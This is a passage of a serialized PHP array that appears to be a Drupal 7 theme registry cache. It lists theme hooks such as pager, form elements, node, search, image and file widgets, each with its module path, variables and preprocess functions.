path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_help\";}s:5:\"table\";a:4:{s:9:\"variables\";a:7:{s:6:\"header\";N;s:4:\"rows\";N;s:10:\"attributes\";a:0:{}s:7:\"caption\";N;s:9:\"colgroups\";a:0:{}s:6:\"sticky\";b:1;s:5:\"empty\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_table\";}s:4:\"mark\";a:4:{s:9:\"variables\";a:1:{s:4:\"type\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_mark\";}s:9:\"item_list\";a:4:{s:9:\"variables\";a:4:{s:5:\"items\";a:0:{}s:5:\"title\";N;s:4:\"type\";s:2:\"ul\";s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_item_list\";}s:14:\"more_help_link\";a:4:{s:9:\"variables\";a:1:{s:3:\"url\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_more_help_link\";}s:9:\"feed_icon\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_feed_icon\";}s:9:\"more_link\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_more_link\";}s:8:\"username\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_username\";s:20:\"preprocess functions\";a:2:{i:0;s:28:\"template_preprocess_username\";i:1;s:23:\"rdf_preprocess_username\";}s:17:\"process functions\";a:1:{i:0;s:25:\"template_process_username\";}}s:12:\"progress_bar\";a:4:{s:9:\"variables\";a:2:{s:7:\"percent\";N;s:7:\"message\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_progress_bar\";}s:11:\"indentation\";a:4:{s:9:\"variables\";a:1:{s:4:\"size\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_indentation\";}s:8:\"html_tag\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_html_tag\";}s:11:\"update_page\";a:4:{s:9:\"variables\";a:2:{s:7:\"content\";N;s:13:\"show_messages\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_update_page\";}s:12:\"install_page\";a:4:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_install_page\";}s:9:\"task_list\";a:4:{s:9:\"variables\";a:2:{s:5:\"items\";N;s:6:\"active\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_task_list\";}s:17:\"authorize_message\";a:4:{s:9:\"variables\";a:2:{s:7:\"message\";N;s:7:\"success\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_authorize_message\";}s:16:\"authorize_report\";a:4:{s:9:\"variables\";a:1:{s:8:\"messages\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_authorize_report\";}s:5:\"pager\";a:4:{s:9:\"variables\";a:4:{s:4:\"tags\";a:0:{}s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}s:8:\"quantity\";i:9;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_pager\";}s:11:\"pager_first\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_pager_first\";}s:14:\"pager_previous\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_pager_previous\";}s:10:\"pager_next\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_next\";}s:10:\"pager_last\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_last\";}s:10:\"pager_link\";a:4:{s:9:\"variables\";a:5:{s:4:\"text\";N;s:8:\"page_new\";N;s:7:\"element\";N;s:10:\"parameters\";a:0:{}s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_link\";}s:9:\"menu_link\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_menu_link\";}s:9:\"menu_tree\";a:5:{s:14:\"render element\";s:4:\"tree\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_menu_tree\";s:20:\"preprocess functions\";a:1:{i:0;s:29:\"template_preprocess_menu_tree\";}}s:15:\"menu_local_task\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_menu_local_task\";}s:17:\"menu_local_action\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_menu_local_action\";}s:16:\"menu_local_tasks\";a:4:{s:9:\"variables\";a:2:{s:7:\"primary\";a:0:{}s:9:\"secondary\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_menu_local_tasks\";}s:6:\"select\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_select\";}s:8:\"fieldset\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_fieldset\";}s:5:\"radio\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_radio\";}s:6:\"radios\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_radios\";}s:4:\"date\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_date\";}s:15:\"exposed_filters\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_exposed_filters\";}s:8:\"checkbox\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_checkbox\";}s:10:\"checkboxes\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_checkboxes\";}s:6:\"button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_button\";}s:12:\"image_button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_image_button\";}s:6:\"hidden\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_hidden\";}s:9:\"textfield\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_textfield\";}s:4:\"form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_form\";}s:8:\"textarea\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_textarea\";}s:8:\"password\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_password\";}s:4:\"file\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_file\";}s:11:\"tableselect\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_tableselect\";}s:12:\"form_element\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_form_element\";}s:20:\"form_required_marker\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_form_required_marker\";}s:18:\"form_element_label\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_form_element_label\";}s:13:\"vertical_tabs\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_vertical_tabs\";}s:9:\"container\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_container\";}s:18:\"system_themes_page\";a:6:{s:9:\"variables\";a:1:{s:12:\"theme_groups\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_themes_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:20:\"system_settings_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_system_settings_form\";}s:12:\"confirm_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_confirm_form\";}s:23:\"system_modules_fieldset\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:29:\"theme_system_modules_fieldset\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:27:\"system_modules_incompatible\";a:6:{s:9:\"variables\";a:1:{s:7:\"message\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:33:\"theme_system_modules_incompatible\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:24:\"system_modules_uninstall\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:30:\"theme_system_modules_uninstall\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:13:\"status_report\";a:6:{s:14:\"render element\";s:12:\"requirements\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_status_report\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:10:\"admin_page\";a:6:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_admin_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:11:\"admin_block\";a:6:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_admin_block\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:18:\"system_admin_index\";a:6:{s:9:\"variables\";a:1:{s:10:\"menu_items\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_admin_index\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:17:\"system_powered_by\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_system_powered_by\";}s:19:\"system_compact_link\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_system_compact_link\";}s:25:\"system_date_time_settings\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:31:\"theme_system_date_time_settings\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:22:\"shortcut_set_customize\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"shortcut.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/shortcut\";s:8:\"function\";s:28:\"theme_shortcut_set_customize\";s:8:\"includes\";a:1:{i:0;s:35:\"modules/shortcut/shortcut.admin.inc\";}}s:17:\"search_block_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:8:\"template\";s:32:\"modules/search/search-block-form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_search_block_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"search_result\";a:8:{s:9:\"variables\";a:2:{s:6:\"result\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:28:\"modules/search/search-result\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_search_result\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"search_results\";a:8:{s:9:\"variables\";a:2:{s:7:\"results\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:29:\"modules/search/search-results\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:34:\"template_preprocess_search_results\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:29:\"rdf_template_variable_wrapper\";a:4:{s:9:\"variables\";a:4:{s:7:\"content\";N;s:10:\"attributes\";a:0:{}s:7:\"context\";a:0:{}s:6:\"inline\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:35:\"theme_rdf_template_variable_wrapper\";}s:12:\"rdf_metadata\";a:4:{s:9:\"variables\";a:1:{s:8:\"metadata\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:18:\"theme_rdf_metadata\";}s:7:\"overlay\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:23:\"modules/overlay/overlay\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_overlay\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:24:\"template_process_overlay\";i:2;s:11:\"rdf_process\";}}s:23:\"overlay_disable_message\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:8:\"function\";s:29:\"theme_overlay_disable_message\";}s:12:\"options_none\";a:4:{s:9:\"variables\";a:2:{s:8:\"instance\";N;s:6:\"option\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:29:\"modules/field/modules/options\";s:8:\"function\";s:18:\"theme_options_none\";}s:4:\"node\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:17:\"modules/node/node\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_node\";i:2;s:21:\"contextual_preprocess\";i:3;s:19:\"rdf_preprocess_node\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"node_search_admin\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_search_admin\";}s:12:\"node_preview\";a:6:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"file\";s:14:\"node.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:18:\"theme_node_preview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}}s:19:\"node_admin_overview\";a:6:{s:9:\"variables\";a:2:{s:4:\"name\";N;s:4:\"type\";N;}s:4:\"file\";s:17:\"content_types.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_admin_overview\";s:8:\"includes\";a:1:{i:0;s:30:\"modules/node/content_types.inc\";}}s:17:\"node_recent_block\";a:4:{s:9:\"variables\";a:1:{s:5:\"nodes\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_recent_block\";}s:19:\"node_recent_content\";a:4:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_recent_content\";}s:18:\"menu_overview_form\";a:6:{s:4:\"file\";s:14:\"menu.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:24:\"theme_menu_overview_form\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}}s:19:\"menu_admin_overview\";a:6:{s:4:\"file\";s:14:\"menu.admin.inc\";s:9:\"variables\";a:3:{s:5:\"title\";N;s:4:\"name\";N;s:11:\"description\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:25:\"theme_menu_admin_overview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}}s:11:\"image_style\";a:4:{s:9:\"variables\";a:7:{s:10:\"style_name\";N;s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:17:\"theme_image_style\";}s:16:\"image_style_list\";a:4:{s:9:\"variables\";a:1:{s:6:\"styles\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:22:\"theme_image_style_list\";}s:19:\"image_style_effects\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_effects\";}s:19:\"image_style_preview\";a:4:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_preview\";}s:12:\"image_anchor\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_anchor\";}s:20:\"image_resize_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_resize_summary\";}s:19:\"image_scale_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_scale_summary\";}s:18:\"image_crop_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:24:\"theme_image_crop_summary\";}s:20:\"image_rotate_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_rotate_summary\";}s:12:\"image_widget\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_widget\";}s:15:\"image_formatter\";a:4:{s:9:\"variables\";a:3:{s:4:\"item\";N;s:4:\"path\";N;s:11:\"image_style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:21:\"theme_image_formatter\";}s:21:\"filter_admin_overview\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_admin_overview\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}}s:32:\"filter_admin_format_filter_order\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:38:\"theme_filter_admin_format_filter_order\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}}s:11:\"filter_tips\";a:6:{s:9:\"variables\";a:2:{s:4:\"tips\";N;s:4:\"long\";b:0;}s:4:\"file\";s:16:\"filter.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:17:\"theme_filter_tips\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.pages.inc\";}}s:19:\"text_format_wrapper\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:25:\"theme_text_format_wrapper\";}s:21:\"filter_tips_more_info\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_tips_more_info\";}s:17:\"filter_guidelines\";a:4:{s:9:\"variables\";a:1:{s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:23:\"theme_filter_guidelines\";}s:9:\"file_link\";a:4:{s:9:\"variables\";a:2:{s:4:\"file\";N;s:14:\"icon_directory\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_link\";}s:9:\"file_icon\";a:4:{s:9:\"variables\";a:2:{s:4:\"file\";N;s:14:\"icon_directory\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_icon\";}s:17:\"file_managed_file\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:23:\"theme_file_managed_file\";}s:11:\"file_widget\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:17:\"theme_file_widget\";}s:20:\"file_widget_multiple\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_widget_multiple\";}s:20:\"file_formatter_table\";a:4:{s:9:\"variables\";a:1:{s:5:\"items\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_formatter_table\";}s:16:\"file_upload_help\";a:4:{s:9:\"variables\";a:2:{s:11:\"description\";N;s:17:\"upload_validators\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:22:\"theme_file_upload_help\";}s:14:\"field_ui_table\";a:4:{s:14:\"render element\";s:8:\"elements\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/field_ui\";s:8:\"function\";s:20:\"theme_field_ui_table\";}s:5:\"field\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:11:\"theme_field\";s:20:\"preprocess functions\";a:2:{i:0;s:25:\"template_preprocess_field\";i:1;s:20:\"rdf_preprocess_field\";}s:17:\"process functions\";a:1:{i:0;s:22:\"template_process_field\";}}s:25:\"field_multiple_value_form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:31:\"theme_field_multiple_value_form\";}s:13:\"dblog_message\";a:6:{s:9:\"variables\";a:2:{s:5:\"event\";N;s:4:\"link\";b:0;}s:4:\"file\";s:15:\"dblog.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/dblog\";s:8:\"function\";s:19:\"theme_dblog_message\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/dblog/dblog.admin.inc\";}}s:9:\"dashboard\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:15:\"theme_dashboard\";}s:15:\"dashboard_admin\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:21:\"theme_dashboard_admin\";}s:16:\"dashboard_region\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:22:\"theme_dashboard_region\";}s:25:\"dashboard_disabled_blocks\";a:4:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme 